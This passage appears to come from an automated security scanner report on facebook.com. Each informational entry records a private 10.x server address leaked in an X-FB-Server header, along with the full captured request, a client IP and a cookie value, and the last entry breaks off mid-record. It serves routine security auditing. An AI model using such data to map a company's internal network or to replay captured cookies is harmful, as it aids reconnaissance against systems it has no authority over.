19.521. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.107.31

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A389%2C%22baseline_elapsed%22%3A389%7D&asyncSignal=4597 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfa16a6c14%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2a478987c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.107.31
X-Cnection: close
Date: Thu, 16 Jun 2011 13:48:15 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.522. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.243.50

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1853%2C%22baseline_elapsed%22%3A1806%7D&asyncSignal=242 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.243.50
X-Cnection: close
Date: Thu, 16 Jun 2011 16:43:54 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.523. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.236.55

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1509%2C%22baseline_elapsed%22%3A1603%7D&asyncSignal=8600 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.236.55
X-Cnection: close
Date: Thu, 16 Jun 2011 17:20:10 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.524. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.118.60

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1140%2C%22baseline_elapsed%22%3A1159%7D&asyncSignal=8779 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df205bff114%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff27f0385c4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.118.60
X-Cnection: close
Date: Thu, 16 Jun 2011 12:04:47 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.525. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.38.61

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1479%2C%22baseline_elapsed%22%3A1508%7D&asyncSignal=2082 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.38.61
X-Cnection: close
Date: Thu, 16 Jun 2011 15:16:01 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.526. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.21.40

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1567%2C%22baseline_elapsed%22%3A1567%7D&asyncSignal=4358 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.21.40
X-Cnection: close
Date: Thu, 16 Jun 2011 16:12:51 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.527. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.149.106

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1585%2C%22baseline_elapsed%22%3A1585%7D&asyncSignal=721 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1bcdaa0cc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3fbe1cebc%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.32.149.106
Connection: close
Date: Thu, 16 Jun 2011 17:56:21 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.528. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.128.51

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1327%2C%22baseline_elapsed%22%3A1458%7D&asyncSignal=5070 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1edb4a8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3d9bc292c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.128.51
X-Cnection: close
Date: Thu, 16 Jun 2011 15:31:38 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.529. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.84.25

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1974%2C%22baseline_elapsed%22%3A1976%7D&asyncSignal=8065 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.84.25
X-Cnection: close
Date: Thu, 16 Jun 2011 16:23:13 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.530. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.32.57

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1330%2C%22baseline_elapsed%22%3A1461%7D&asyncSignal=2792 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd58836c8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3d9bc292c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.32.57
X-Cnection: close
Date: Thu, 16 Jun 2011 15:31:38 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.531. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.145.111

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1359%2C%22baseline_elapsed%22%3A1359%7D&asyncSignal=4096 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df37cc8d578%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3d6a4ceb4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.27.145.111
X-Cnection: close
Date: Thu, 16 Jun 2011 14:55:25 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.532. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.235.56

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1081%2C%22baseline_elapsed%22%3A1203%7D&asyncSignal=1959 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1fc1d809c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3774078cc%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.235.56
X-Cnection: close
Date: Thu, 16 Jun 2011 17:46:01 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.533. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.231.119

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1348%2C%22baseline_elapsed%22%3A1348%7D&asyncSignal=2290 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df75bab87c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3d6a4ceb4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.27.231.119
X-Cnection: close
Date: Thu, 16 Jun 2011 14:55:25 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.534. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.138.61

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1822%2C%22baseline_elapsed%22%3A1821%7D&asyncSignal=3075 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.138.61
X-Cnection: close
Date: Thu, 16 Jun 2011 17:14:58 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.535. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.203.33

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1522%2C%22baseline_elapsed%22%3A1522%7D&asyncSignal=1729 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.203.33
X-Cnection: close
Date: Thu, 16 Jun 2011 14:03:42 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.536. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.104.63

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1546%2C%22baseline_elapsed%22%3A1600%7D&asyncSignal=5752 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.104.63
X-Cnection: close
Date: Thu, 16 Jun 2011 18:53:16 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.537. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.24.50

Request

